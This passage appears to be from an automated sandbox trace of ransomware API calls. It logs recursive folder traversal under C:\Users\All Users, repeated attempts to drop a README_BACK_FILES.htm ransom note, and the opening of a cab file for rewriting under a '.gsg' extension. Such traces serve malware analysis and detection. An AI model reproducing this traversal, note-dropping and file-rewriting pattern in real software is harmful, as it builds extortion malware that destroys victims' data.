users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\readme_back_files.htm")) returned 0xffffffff [0240.644] AreFileApisANSI () returned 1 [0240.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28cb7f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 95 [0240.644] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.645] GetLastError () returned 0x5 [0240.645] GetLastError () returned 0x5 [0240.645] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.645] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.645] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\vault\\readme_back_files.htm")) returned 0xffffffff [0240.645] AreFileApisANSI () returned 1 [0240.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd028, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0240.645] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Vault\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\vault\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.646] GetLastError () returned 0x5 [0240.646] GetLastError () returned 0x5 [0240.646] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.646] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WDF\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.646] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.646] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.646] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.647] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WDF\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wdf\\readme_back_files.htm")) returned 0xffffffff [0240.647] AreFileApisANSI () returned 1 [0240.647] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0240.647] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WDF\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wdf\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.648] GetLastError () returned 0x5 [0240.648] GetLastError () returned 0x5 [0240.648] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.648] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.648] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.648] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.648] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.648] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.649] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.649] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.649] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8638 [0240.649] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.649] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.649] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.649] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\readme_back_files.htm")) returned 0xffffffff [0240.649] AreFileApisANSI () returned 1 [0240.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6fd8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 68 [0240.649] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\Server\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\server\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.650] GetLastError () returned 0x5 [0240.650] GetLastError () returned 0x5 [0240.650] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.650] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.650] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\readme_back_files.htm")) returned 0xffffffff [0240.651] AreFileApisANSI () returned 1 [0240.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd100, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0240.651] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WinMSIPC\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\winmsipc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.651] GetLastError () returned 0x5 [0240.651] GetLastError () returned 0x5 [0240.651] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.651] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e88b8 [0240.652] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.652] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.652] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84f8 [0240.652] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.652] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.652] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.652] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\readme_back_files.htm")) returned 0xffffffff [0240.653] AreFileApisANSI () returned 1 [0240.653] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6bb8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0240.653] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\DMProfiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\dmprofiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.653] GetLastError () returned 0x5 [0240.653] GetLastError () returned 0x5 [0240.653] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.653] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8638 [0240.654] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.654] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.654] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.654] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\readme_back_files.htm")) returned 0xffffffff [0240.654] AreFileApisANSI () returned 1 [0240.654] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6a58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0240.654] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\Profiles\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\profiles\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.655] GetLastError () returned 0x5 [0240.655] GetLastError () returned 0x5 [0240.655] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.655] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.655] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\readme_back_files.htm")) returned 0xffffffff [0240.655] AreFileApisANSI () returned 1 [0240.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd7c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0240.655] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\WwanSvc\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\wwansvc\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.656] GetLastError () returned 0x5 [0240.656] GetLastError () returned 0x5 [0240.656] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0240.656] FindClose (in: hFindFile=0x282df78 | out: hFindFile=0x282df78) returned 1 [0240.656] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\readme_back_files.htm")) returned 0xffffffff [0240.656] AreFileApisANSI () returned 1 [0240.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0240.657] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.657] GetLastError () returned 0x5 [0240.657] GetLastError () returned 0x5 [0240.657] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0240.657] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft OneDrive\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e84f8 [0240.657] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.657] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.658] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.658] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft OneDrive\\setup\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e88b8 [0240.658] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.658] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.658] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.658] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.658] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft OneDrive\\setup\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft onedrive\\setup\\readme_back_files.htm")) returned 0x20 [0240.658] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0240.658] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.658] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft OneDrive\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft onedrive\\readme_back_files.htm")) returned 0x20 [0240.659] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0240.659] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0240.659] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.659] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.659] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.659] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.659] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.659] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.659] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.659] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.659] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.660] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.660] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.660] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\.oracle_jre_usage\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\.oracle_jre_usage\\readme_back_files.htm")) returned 0x20 [0240.660] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.660] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\installcache_x64\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.660] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.660] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.660] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.660] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.661] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\installcache_x64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\readme_back_files.htm")) returned 0xffffffff [0240.661] AreFileApisANSI () returned 1 [0240.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6f80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0240.661] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\installcache_x64\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.661] GetLastError () returned 0x5 [0240.661] GetLastError () returned 0x5 [0240.661] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.662] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.662] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.662] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.662] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.662] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.662] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.662] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.663] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\javapath\\readme_back_files.htm")) returned 0xffffffff [0240.663] AreFileApisANSI () returned 1 [0240.663] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd808, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0240.663] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\javapath\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.664] GetLastError () returned 0x5 [0240.664] GetLastError () returned 0x5 [0240.664] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.664] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.664] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.664] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.664] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.664] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.664] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.664] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.664] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\javapath_target_5923062\\readme_back_files.htm")) returned 0xffffffff [0240.665] AreFileApisANSI () returned 1 [0240.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2f6d18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0240.665] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\javapath_target_5923062\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\javapath_target_5923062\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.665] GetLastError () returned 0x5 [0240.665] GetLastError () returned 0x5 [0240.665] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.665] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0240.665] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.666] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\Java\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\java\\readme_back_files.htm")) returned 0x20 [0240.666] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.666] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0240.666] FindClose (in: hFindFile=0x28e88b8 | out: hFindFile=0x28e88b8) returned 1 [0240.666] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Oracle\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\oracle\\readme_back_files.htm")) returned 0x20 [0240.666] FindNextFileA (in: hFindFile=0x282e3b8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0240.666] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x28e88b8 [0240.667] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.667] FindNextFileA (in: hFindFile=0x28e88b8, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0240.667] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28e84f8 [0240.668] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.668] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.669] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e8578 [0240.669] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.669] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.669] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28e8638 [0240.669] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.669] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.669] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.669] GetLastError () returned 0x12 [0240.669] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab")) returned 0x20 [0240.670] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0240.670] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.671] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab.gsg" 